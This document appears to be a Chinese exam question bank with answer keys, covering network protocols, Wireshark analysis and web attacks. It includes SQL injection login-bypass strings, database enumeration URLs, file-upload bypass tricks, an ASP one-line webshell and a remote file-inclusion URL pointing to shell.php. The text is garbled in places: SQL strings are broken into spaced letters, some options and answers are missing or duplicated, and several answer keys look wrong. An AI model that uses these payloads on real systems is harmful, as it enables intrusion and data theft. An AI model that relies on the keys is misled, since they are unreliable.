B、 每四秒为间隔切分成一个文件
C、 每四分钟为间隔切分成一个文件
标准答案: B
46、使用tshark -n -q -r x.pcap -z “smb.srt”命令可以获取cifs协议响应时间的统计数据
A、 对
B、 错
标准答案: A
47、IP地址位于IOS七层模型的哪一层()
A、 会话层
B、 网络层
C、 数据链路层
D、 传输层
标准答案: B
48、Mac地址位于IOS七层模型的哪一层()
A、 会话层
B、 网络层
C、 数据链路层
D、 传输层
标准答案: C
49、ARP协议的作用是()
A、 将端口号映射到IP地址
B、 连接IP层和TCP层
C、 广播IP地址
D、 将IP地址映射到第二层地址
标准答案: D
50、ARP协议的解析过程用了几种数据包()
A、 2
B、 3
C、 4
标准答案: A
1、使用哪条命令查看本地的缓存列表()
A、 arp -d
B、 arp -a
C、 arp -s
D、 arp -N
标准答案: B
2、免费ARP报文携带的发送端地址和目标地址都是本机IP地址
A、 对
B、 错
标准答案: A
3、ICMP是什么协议()
A、 动态主机设置协议
B、 Internet控制报文协议
C、 超文本传输协议
D、 超文本传输协议
标准答案: B
4、假设TTL的初始值为3,两台主机之间存在4个路由器,则该数据包到达目的地后的TTL的值为()
A、 1
B、 2
C、 3
D、 数据包无法到达
标准答案: D
5、在IP数据包里,如果一个数据流被分割成了三片,则最后一个数据包的More fragments的值为()
B、 1
C、 2
D、 4
标准答案: A
6、以下哪个端口可以由操作系统临时使用()
A、 143
B、 80
C、 443
D、 1433
标准答案: D
7、在正常的TCP握手数据包中,如果第一次握手的seq=1,则第三次握手的seq值应该是()
标准答案: C
8、在TCP的断开流程中,第三次会发出()标志位的TCP数据包。
A、 FIN
B、 ACK
C、 FIN/ACK
D、 WIND
标准答案: C
9、TCP数据包里的出现什么标志位表示连接被异常终止,或被拒绝的异常请求()
A、 FIN/ACK
B、 ACK
C、 SYN
D、 RST/ACK
标准答案: D
10、如果一个TCP的数据包的Len=0,则以下说法正确的是()
A、 这是一个无意义的数据包
B、 并不能说明什么
C、 网络传输出现了故障
D、 这是一个错误的数据包
标准答案: B
11、TCP提供有序的数据传输依靠什么序列号来排序()
A、 SEQ
B、 FIN
C、 ACK
D、 SYN
标准答案: A
12、第二个TCP数据包的Seq值等于第一个数据包的Seq值加上()
A、 win
B、 Len
C、 ACK
D、 SEQ
标准答案: B
13、在TCP数据交互里,什么决定是否有必要进行数据包重传的一个主要机制()
A、 WIND
B、 RTO
C、 LEN
D、 TTL
标准答案: B
14、Windows系统默认的TCP Retransmission的次数为()
A、 3
B、 4
C、 5
D、 6
标准答案: C
15、在TCP协议包里,如果接收方发现丢包的情况,则会发送()个重复ACK数据包
A、 3
B、 4
C、 5
D、 6
标准答案: A
16、在TCP协议包里,如果SACK后面的值为100-200,则说明()
A、 100之前的数据已收到
B、 100至200的数据未收到
C、 100至200的数据已收到
D、 200之后的数据已收到
标准答案: C
17、ICMP数据包的最大尺寸为()
A、 16K
B、 32K
C、 64K
D、 128K
标准答案: C
18、哪个命令用于识别一个设备到另一个设备的网络路径()
A、 ping
B、 tracert
C、 nslookup
D、 net send
标准答案: B
19、tracert命令进行路由跟踪时,TTL值初始为()
标准答案: B
20、使用tracert时,如果遇到第一个路由器,数据包就被丢弃,则()
A、 数据包不再发送
B、 重新发送相同的数据包
C、 将TTL值增1之后再发送
D、 以上无正确答案
标准答案: B
21、DHCP协议属于IOS哪一层协议()
A、 会话层
B、 网络层
C、 数据链路层
D、 应用层
标准答案: D
22、以下哪个选项不属于DHCP的工作过程()
A、 DHCP Discover
B、 DHCP offer
C、 DHCP Request
D、 DHCP Listen
标准答案: D
23、在DHCP协议Discover包中,客户端IP地址为()
A、 0.0.0.0
B、 255.255.255.255
C、 网关IP
D、 无法确定
标准答案: A
24、在Wireshark下筛选DHCP协议的数据包的关键字是()
A、 bootp
B、 udp
C、 bootparams
D、 tcp
标准答案: A
25、在进行DNS解析的过程中,客户计算机会首先在本地的()文件中查找主机名称所对应的IP地址
A、 svchost
B、 config.ini
C、 hosts
D、 taskmgr
标准答案: C
26、DNS区域传送使用什么数据包()
A、 HTTP
B、 BOOTP
C、 DHCP
D、 TCP
标准答案: D
27、DNS解析的两种查询方式()
A、 反向查询
B、 迭代查询
C、 循环查询
D、 递归查询
标准答案:
28、DNS的作用是完成域名和IP地址相互转换的工作
A、 对
B、 错
标准答案: A
29、DNS服务使用的端口号是()
A、 443
B、 53
C、 23
D、 25
标准答案: B
30、当HTTP连接成功完成后,则最后一个数据包里面的状态码为()
A、 200
B、 403
C、 404
D、 500
标准答案: A
31、HTTP 302状态消息表示?()
A、 所请求的页面已经转移至新的url
B、 所请求的页面已经临时转移至新的url
C、 对被请求页面的访问被禁止
D、 所请求的页面可在别的url下被找到
标准答案: B
32、Wireshark工具下,使用哪条命令筛选出HTTP请求包()
A、 http.request.line
B、 http.request.method
C、 http.request.version
D、 http.request.method==GET
标准答案: D
33、Https服务使用的端口号是()
A、 23
B、 25
C、 53
D、 443
标准答案: D
34、以下哪项一般不会使用SSL协议进行数据传输()
A、 QQ邮箱登录
B、 网银登录
C、 论坛登陆
D、 网上支付
标准答案: C
35、在SSL握手的过程中,紧接着Server Hello的过程是()
A、 Client Hello
B、 Client Key Exchange
C、 Application Data
D、 Certificate
标准答案: D
36、FTP进行数据传输所使用的默认端口为()
A、 20
B、 21
C、 24
D、 23
标准答案: A
37、FTP协议默认采用的不是明文账户密码传输
A、 对
B、 错
标准答案: B
38、FTP被动方式传输数据包的关键字是PASV
A、 对
B、 错
标准答案: A
39、在实际的网络应用中,Kerberos的认证结果是()
A、 单向
B、 双向
C、 不定向
D、 依据网络实际情况而定
标准答案: B
40、在Kerberos中,哪个拥有所有的密码()
A、 Client
B、 Server
C、 KDC
D、 无正确答案
标准答案: C
41、在Kerberos中,通过计算发送时间与接收回复时间的差值,可以对抗什么攻击()
A、 DDoS
B、 重放
C、 木马
D、 暴力破解
标准答案: B
42、以下哪个操作系统一般并不使用NFS协议()
A、 Windows
B、 Ubuntu
C、 RedHat
D、 Centos
标准答案: A
43、在NFS的写文件操作中,需要利用什么操作来确定是否存盘()
A、 GETPORT
B、 ACCESS
C、 WRITE
D、 COMMIT
标准答案: D
44、在NFS的写文件操作协议中,查看文件是否存在使用什么标识头()
A、 LOOKUP
B、 CREATE
C、 GETATTR
D、 COMMIT
标准答案: A
45、在NFS协议中,Portmap请求无回复,可能是防火墙导致
A、 对
B、 错
标准答案: A
46、在NFS协议中,MOUNT请求无回复,可能是共享目录访问控制权限导致
A、 对
B、 错
标准答案: A
47、在NTF协议中,用什么标识来确认用户()
A、 UID
B、 GID
C、 Name
标准答案: A
48、linux系统里可以使用CIFS协议
A、 对
B、 错
标准答案: B
49、以下哪个是Windows自己维护的文件共享协议()
A、 TCP
B、 NFS
C、 TCP
D、 SMB
标准答案: D
50、在SMB协议包中,Session Setup的任务是()
A、 身份验证
B、 身份确认
C、 会话结束
标准答案: A
1、SMB中的什么操作可以对访问权限进行检测()
A、 write
B、 read
C、 create
D、 trans
标准答案: C
2、在SMB协议中,create操作包括哪些动作()
A、 新建文件
B、 目录打开
C、 文件读写
标准答案:
3、CIFS协议在Windows 7中可以一次性发送多个连接请求
A、 对
B、 错
标准答案: A
4、以下哪个协议与电子邮件协议无关()
A、 HTTP
B、 IMAP
C、 POP
D、 SMTP
标准答案: A
5、邮件的附件内容是利用什么方式进行加密的()
A、 MD5
B、 RSA
C、 Base64
D、 DES
标准答案: C
6、SMTP协议包,文本内容以什么作为结束符()
A、 CR
B、 CR&LF
C、 LF
D、 ENTER
标准答案: B
7、SMTP协议使用的端口()
A、 21
B、 143
C、 24
D、 25
标准答案: D
8、在POP协议中,客户端向服务端发送什么命令请求邮件的内容()
A、 LIST
B、 RETR
C、 UIDL
D、 QUIT
标准答案: B
9、常用以双等号结尾的加密数据,一般采用Base64解密
A、 对
B、 错
标准答案: A
10、判断一个文件是不是PE文件,常用的方法是()
A、 查看文件扩展名
B、 查看文件开头位置是不是0xFFD8
C、 查找MZ以及PE标志
D、 没有特别有效的办法
标准答案: C
11、以下哪款工具主要用于文件的二进制修改()
A、 FFV
B、 WinHex
C、 Beyond Compare
D、 python
标准答案: B
12、NBNS协议是网络基本输入/输出系统协议
A、 对
B、 错
标准答案: A
13、在局域网内部使用什么协议可以方便地实现消息通信及资源的共享()
A、 NetBIOS
B、 DHCP
C、 ICMP
D、 DNS
标准答案: A
14、在以下什么数据包中,可以找到主机名称和所处的环境工作组()
A、 DNS
B、 DHCP
C、 ICMP
D、 NBNS
标准答案: D
15、Kali Linux使用什么来获取IPv6的地址()
A、 ARPv6
B、 DHCPv6
C、 ICMPv6
D、 DNSv6
标准答案: C
16、对比WinXP的默认启动过程,什么是Kali Linux启动过程所独有的()
A、 NBNS
B、 DHCPv6
C、 ICMPv6
D、 DNSv6
标准答案: C
17、IPv4地址的长度为多少位()
A、 16
B、 32
C、 64
D、 128
标准答案: B
18、某子网掩码为255.255.0.0,说明网络地址长度为多少位()
A、 16
B、 32
C、 64
D、 128
标准答案: A
19、在IP地址10.10.1.22和网络掩码255.255.0.0的情况下,下面哪个选项是正确的CIDR写法()
A、 10.10.1.22/8
B、 10.10.1.22/16
C、 10.10.1.22/24
D、 10.10.1.22/32
标准答案: B
20、计算机跨子网通信是需要默认网关来进行转发
A、 对
B、 错
标准答案: A
21、如果Wireshark当前所发送的数据包填满接收方的缓存时,就会在该TCP数据包上标记出什么字样
A、 TCP Window Full
B、 TCP Zero Window
C、 Zero Window Prob
D、 Zero Window Violation
标准答案: A
22、当接收方收到包含有“TCP Window Full”字样的TCP数据包以后,如果不能够及时处理缓存中的内容,那么接收方一般会回复一条带有什么字样的数据包,请求发送方暂缓发送数据()
A、 TCP Window Full
B、 TCP Zero Window
C、 Zero Window Prob
D、 Zero Window Violation
标准答案: B
23、发送方在发送了一个TCP数据包之后,经过RTO时间,没有收到对方的确认数据包,则应该?
A、 停止通信
B、 检测网络
C、 重传
D、 直接发送下一个数据包
标准答案: C
24、进行流量分析,端口镜像往往是我们首选的功能,因为它不会留下网络痕迹,也不会因此而产生额外的数据包
A、 对
B、 错
标准答案: A
25、以下哪项无线协议标准最不安全()
A、 WEP
B、 WPA
C、 WPA2
D、 WPA3
标准答案: A
26、无线网络协议遵循的是IEEE的什么标准()
A、 800.11
B、 801.1
C、 802.1
D、 802.11
标准答案: D
27、无线网络数据包与有线网络数据包最大的不同在于额外的802.11头部
A、 对
B、 错
标准答案: A
28、下面哪项是首选的嗅探器部署方法,因为它不会留下网络痕迹,也不会因此而产生额外的数据包()
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
标准答案: A
29、以下哪种wireshark部署方法,并不推荐采用()
A、 单个系统安装
B、 端口镜像
C、 集线器输出
D、 使用网络分流器
标准答案: A
30、不用考虑客户机临时下线的情况,我们采用哪种流量部署方法()
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
标准答案: C
31、在光纤情况下,不用考虑客户机临时下线的情况,我们采用哪种流量部署方法?
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
标准答案: D
32、进行环境测试评估,和进行性能审查,分析数据包,我们采用哪种流量部署方法()
A、 端口镜像
B、 ARP欺骗
C、 直接系统安装
D、 使用网络分流器
标准答案: C
33、网络分流器一般有聚合的和非聚合的网络分流器两种
A、 对
B、 错
标准答案: A
34、对于TCP的三次握手,以下哪项用于第一个数据包()
A、 SYN
B、 FIN
C、 RST
D、 ACK
标准答案: A
35、以下哪个文件保存有域名重定向信息()
A、 svchost
B、 csrss
C、 hosts
D、 spoolsv
标准答案: C
36、当试图访问对方未配置的的80端口时,对方数据包会回复()
A、 SYN
B、 FIN
C、 RST
D、 ARP
标准答案: C
37、在TCP的SYN数据包之后,应当收到什么数据包()
A、 SYN
B、 FIN
C、 RST
D、 SYN\ACK
标准答案: D
38、连远程服务器无响应无TCP RST这样的数据包,以下哪项不属于这种情况出现的原因()
A、 Web服务器配置错误
B、 Web服务器的协议栈崩溃
C、 防火墙数据包过滤设备
D、 Hosts配置错误
标准答案: D
39、DNS是基于什么协议()
A、 UDP
B、 TCP
C、 HTTP
D、 FTP
标准答案: A
40、DNS在如同区域传输中,使用什么协议()
A、 UDP
B、 TCP
C、 HTTP
D、 FTP
标准答案: B
41、关于CSRF说法正确的是
A、 删掉referer字段可以用来防止CSRF攻击
B、 CSRF攻击只能利用GET方式去达到攻击的目的
C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击
D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站
标准答案: D
42、xss和csrf的漏洞原理是一样的
A、 对
B、 错
标准答案: B
43、在利用CSRF漏洞去脱裤的时候,说法错误的是
A、 CSRF是利用管理员的操作在无声无息中进行
B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作
C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库
D、 找到备份数据库的网站路径即可下载网址的.sql文件
标准答案: B
44、CSRF可以在无声无息中进行管理员的操作
A、 对
B、 错
标准答案: A
45、关于逻辑/越权漏洞说法有误的是
A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞
B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。
C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因
D、 密码找回漏洞是权限管理不足导致的问题
标准答案: D
46、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键
A、 对
B、 错
标准答案: A
47、关于密码找回说法有误的是
A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解
B、 有些密码找回凭证可从客户端直接获取
C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞
D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置
标准答案: C
48、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的
A、 对
B、 错
标准答案: A
49、关于越权漏洞说法有误的是
A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定
B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试
C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户
D、 4. 越权漏洞的本身对网站不会照成攻击伤害
标准答案: D
50、以下哪个选项对asp运算符的解释错误?()
A、 <>为不等于
B、 IS判断两个字符串是否相等
C、 XOR为"异或"运算
D、 OR为"或"运算
标准答案: B
1、SQL语句"select * from user where name=’". n a m e . " ′ a n d p a s s = ′ " . name."' and pass='". name."′andpass=′".pass."’"如何绕过登录?()
A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456
B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456
C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456
D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456
标准答案: C
2、以下哪个选项的内容可以替代SQL语句中的空格?()
A、 /**/
B、 #
C、 –
D、 //
标准答案: A
3、PHP的addslashes函数的作用是什么?()
A、 去除字符串中的预定义字符
B、 将字符串中的预定义字符之前添加反斜杠
C、 将字符串按照预定义字符进行分割
D、 将字符串中的预定义字符替换为空格
标准答案: B
4、mysql数据库使用utf-8字符集可能导致宽字节注入。
A、 对
B、 错
标准答案: B
5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()
A、 使用PHP的trim函数,字符集使用utf-8
B、 使用PHP的trim函数,字符集使用gbk
C、 使用PHP的addslashes函数,字符集使用utf-8
D、 使用PHP的addslashes函数,字符集使用gbk
标准答案: D
6、以下哪种方式可以防止宽字节注入?()
A、 mysql_query(“set names gbk”)和addslashes()函数结合使用
B、 使用mysql_query(“set names gbk”)设置字符集
C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用
D、 使用mysql_set_charset(“gbk”)设置字符集
标准答案: C
7、下列 ASP 接受参数的方式错误的是()
A、 request
B、 request.get
C、 request.cookie
D、 request.form
标准答案: B
8、下列链接中不存在注入点的是()
A、 http://www.****.com/***.asp?id=XX
B、 http://www.****.com/***.php?name=XX&page=99
C、 http://www.****.com/index/new/php-8.html
D、 http://www.****.com/news.html
标准答案: D
9、下列 mysql 的 PHP 函数说法错误的是()
A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接
B、 mysql_db_select($database, $conn); 选择数据库
C、 mysql_query($sql, $conn); 执行 SQL 语句
D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中
标准答案: B
10、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()
A、 对
B、 错
标准答案: A
11、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()
A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入
B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入
C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入
D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入
标准答案: C
12、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `member` WHERE `username` = "'. sql=′SELECT∗FROM‘member‘WHERE‘username‘="′._GET[‘name’].’" AND password
= “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()
A、 对
B、 错
标准答案: A
13、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `memeber` WHERE `username` = "'. sql=′SELECT∗FROM‘memeber‘WHERE‘username‘="′.user.’" AND pass
= “’.$pass.’”’,下列能成功执行注入的是()
A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;
B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;
C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;
D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;
标准答案: D
14、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()
A、 对
B、 错
标准答案: A
15、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()
A、 4
B、 5
C、 6
D、 7
标准答案: B
16、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()
A、 5
B、 6
C、 7
D、 8
标准答案: B
17、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()
A、 所有数据库
B、 所有表
C、 所有字段
D、 所有字段类型
标准答案: A
18、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()
A、 TABLES
B、 SCHEMATA
C、 COLUMNS
D、 DATABASES
标准答案: B
19、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()
A、 对
B、 错
标准答案: A
20、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()
A、 SELECT user(),version(),database();
B、 SELECT user(),’,’,version(),’,’,database();
C、 SELECT user().version().database();
D、 SELECT group_concat(user(),version(),database());
标准答案: D
21、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()
A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;
B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;
C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;
D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;
标准答案: B
22、下面上传突破说法错误的是()
A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传
B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传
C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破
D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破
标准答案: D
23、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()
A、 对
B、 错
标准答案: A
24、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()
A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面
B、 直接在抓的包中修改 Content-Type
C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00
标准答案: C
25、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()
A、 对
B、 错
标准答案: A
26、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()
A、 上传文件 shell.PhP
B、 上传文件 shell.php4
C、 上传文件 shell.php3
D、 上传文件 shell.php .jpg
标准答案: A
27、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()
A、 对
B、 错
标准答案: A
28、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()
A、 对
B、 错
标准答案: A
29、下列即属于黑名单检测绕过又属于白名单检测绕过的是()
A、 文件名大小写绕过
B、 名单列表绕过
C、 特殊文件名绕过(windows)
D、 0x00 截断绕过
标准答案: D
30、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()
A、 对
B、 错
标准答案: A
31、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()
A、 http://www.mubiao.com/file.php?read=../../../image/shell.php
B、 http://www.mubiao.com/file.php?read=/image/shell.php
C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php
D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php
标准答案: D
32、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()
A、 对
B、 错
标准答案: B
33、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()
A、 upload/…/test.zip
B、 upload/…/./test.zip
C、 config/…/upload/test.zip
D、 config/././upload/test.zip
标准答案: C
34、Windows平台下的Web目录下的test.php不能通过test.PhP访问。
A、 对
B、 错
标准答案: B
35、PHP执行函数strrpos(“I_love_php.php”,".php")会返回什么值?()
A、 7
B、 8
C、 9
D、 10
标准答案: D
36、PHP执行函数strtolower(“PHP”)会返回什么值?()
A、 php
B、 Php
C、 PHp
D、 PHP
标准答案: A
37、关于安全狗检测cookie注入的功能,下列哪些说法正确?
A、 点击主动防御菜单中,Sql注入规则,选择cookie,点击确定
B、 无需配置,安全狗默认开启
C、 点击资源保护,选择cookie注入检测
标准答案: A
38、如果网站id参数过滤了and和号,就无法进行手工判断是否有注入点。
A、 对
B、 错
标准答案: B
39、在Sqlmap的tamper插件中,可以将空格转移成其他字符的是哪个脚本?
A、 space2mysqlblank
B、 apostrophemask
C、 equaltolike
标准答案: A
40、Sqlmap使用哪个参数可以直接对网站进行注入判断?
A、 --data
B、 --dbs
C、 =-u
标准答案: C
41、如何判断网站是否存在注入点?
A、 在网站参数后输入中文字符
B、 在网站参数后输入and 1=1、and 1=2
C、 在网站参数后输入 or 1=1
标准答案: B
42、Sqlmap中,下列哪个参数,可以获取当前数据库所在名称?
A、 --current-db
B、 --data
C、 --tables
标准答案: A
43、以下选项中,那一项是正确的PHP一句话木马?
A、
B、
C、 <%execute(request(“value”))%>
D、 <%eval(Request.Item[“value”])%>
标准答案: B
44、用户在上传图片时,快速返回错误提示则说明是本地的上传类型验证。
A、 对
B、 错
标准答案: A
45、当页面返回“File Type Error”时,则说明你上传的文件类型不正确,网站对文件类型进行了相关验证。
A、 对
B、 错
标准答案: A
46、针对文件扩展名检测,哪些扩展名可以绕过该限制?
A、 php2和php3
B、 php4和php3
C、 php5和php3
D、 php5和php2
标准答案: B
47、针对文件内容检测,如何进行绕过而上传?
A、 修改图片的类型
B、 使用burp抓包并插入一句话木马
C、 使用burp抓包并插入一句话木马,修改文件后缀
D、 使用burp抓包并修改文件后缀
标准答案: C
48、空字节截断目录路径检测绕过是将文件后缀替换空格就会成功上传
A、 对
B、 错
标准答案: B
49、在本节视频中,IIS6.0站上的解析缺陷绕过,上传后保存的路径正确的是?
A、 在1.php目录下
B、 1.php:1412790008.jpg
C、 upload/1.php
D、 upload/1412790008.jpg
标准答案: B
50、Apache服务中的解析缺陷,可以导致绕过上传的文件格式是什么?
A、 7z
B、 asp
C、 php
D、 asps
标准答案: A
1、htaccess文件上传解析漏洞,可以导致正确被解析的文件格式是?
A、 .png
B、 .bmp
C、 .img
D、 .jpg
标准答案: D
2、FCK编辑器的查看版本的URL路径是?
A、 _whatsnew.htmls
B、 _whatsnew.html
C、 _samples/default.html
D、 _samples/default.html/fck.html
标准答案: B
3、使用FCK编辑器解析漏洞进行上传,以下说法正确的是?
A、 直接利用新建文件夹1.asp
B、 新建文件夹1.asp,在1.asp目录下新建2.asp
C、 利用新建文件夹1.asp,再修改文件内容上传
D、 修改文件内容上传
标准答案: B
4、在IIS管理器里设置IP地址和域名限制拒绝列表不可以限制页面的访问
A、 对
B、 错
标准答案: B
5、.htaccess设置列表allow参数的意思是?
A、 禁止显示目录列表
B、 封禁一个IP地址
C、 允许特定的IP地址
D、 重定向
标准答案: C
6、下列选项对于谷歌语法中的site用法解释正确的是?
A、 把搜索范围规定在特定的站点中
B、 搜素范围限定在标题中
C、 网址中url的一些信息
D、 网页的链接中包含所有查询关键字
标准答案: A
7、服务端未对传入的跳转URL参数进行检测和控制而导致的URL调整漏洞
A、 对
B、 错
标准答案: A
8、XSS漏洞产生的原因是什么?
A、 对用户的输入过滤不足
B、 浏览器植入恶意软件
C、 Post请求被劫持
D、 WebKit安全机制不严谨
标准答案: A
9、利用存储型XSS漏洞可以进行XSS蠕虫攻击。
A、 对
B、 错
标准答案: A
10、当XSS代码被嵌入到标签中时,应该使用何种方式继续尝试进行攻击?
A、 修改浏览器进行尝试
B、 闭合标签后提交代码
C、 更换页面继续进行尝试
D、 闭合
标准答案: B
11、在浏览器支持JavaScript伪协议的情况下,可以使用HTML的属性值执行XSS代码
A、 对
B、 错
标准答案: A
12、在IE5及以后,CSS样式中使用Expression同样可以触发XSS漏洞
A、 对
B、 错
标准答案: A
13、采用黑名单过滤方式,用户可以结合使用注释字符感染和欺骗过滤器
A、 对
B、 错
标准答案: A
14、css_soup = BeautifulSoup(’
’);css_soup.p[‘class’] 这句输出的是字符串"body"吗A、 对
B、 错
标准答案: B
15、Tag.clear() 方法是用来移除当前Tag的吗?
A、 对
B、 错
标准答案: B
16、code, head, html, redirect_url, log = hh.http(url)中log的数据类型是什么?
A、 字符串
B、 数字
C、 字典
D、 链表
标准答案: C
17、hackhttp可以用来上传文件这个说法正确吗
A、 对
B、 错
标准答案: A
18、hackhttp是通过以下代码来自定义cookie的吗 hackhttp.hackhttp(cookie=“a=b;”) ?
A、 对
B、 错
标准答案: B
19、BeautifulSoup 对象的.contents 属性可以将tag的子节点以数据类型的方式输出,是什么数据类型?
A、 字符串
B、 数字
C、 字典
D、 列表
标准答案: D
20、hh.http函数可以添加raw参数来发送原始http数据包这个说法正确吗
A、 对
B、 错
标准答案: A
21、hackhttp的示例代码code, head, html, redirect_url, log = hh.http(url)中hackhttp源码定义return这五个值的地方没有进行异常处理这个说法正确吗?
A、 对
B、 错
标准答案: B
22、queue库中构造函数Queue.LifoQueue实现的队列的进出关系是什么。
A、 先进先出
B、 先进后出
C、 优先级低先出
D、 就不出来
标准答案: B
23、class sb(threading.Thread):创建threading.Thread的父类来包装一个线程对象这个说法正确吗?
A、 对
B、 错
标准答案: B
24、代码for i in range(2122, 2127):的循环是用来遍历数字2122-2127这个说法正确吗?
A、 对
B、 错
标准答案: A
25、
A、 对
B、 错
标准答案: A
26、re.compile(“lowb”)会将字符串转化为一个什么对象?
A、 StringObject
B、 RegexObject
C、 InterObject
D、 NoneObject
标准答案: B
27、所有场景下使用re.compile预编译正则表达式都可以加快程序运行速度吗?
A、 对
B、 错
标准答案: B
28、视频中通过http响应中的响应实体来判断请求是否成功这个说法是否正确?
A、 对
B、 错
标准答案: A
29、视频中爬去漏洞id的代码是调用bs4进行筛选的这个说法对吗
A、 对
B、 错
标准答案: A
30、视频中是通过遍历页面获取每个漏洞的信息的吗?
A、 对
B、 错
标准答案: A
31、假设爬取poc的过程中响应的Content-Type为application/pdf那么我们可以说爬取成功了吗
A、 对
B、 错
标准答案: B
32、当爬取某一资源必须处在登陆状态时,带上cookie访问是否是一个长久的解决方案?
A、 对
B、 错
标准答案: B
33、Python库requests中requests.get(某url).headers输出的数据的数据类型是什么?
A、 元组
B、 字典
C、 字符串
D、 列表
标准答案: B
34、HTTP中的Keep-Alive是指持久连接吗
A、 对
B、 错
标准答案: A
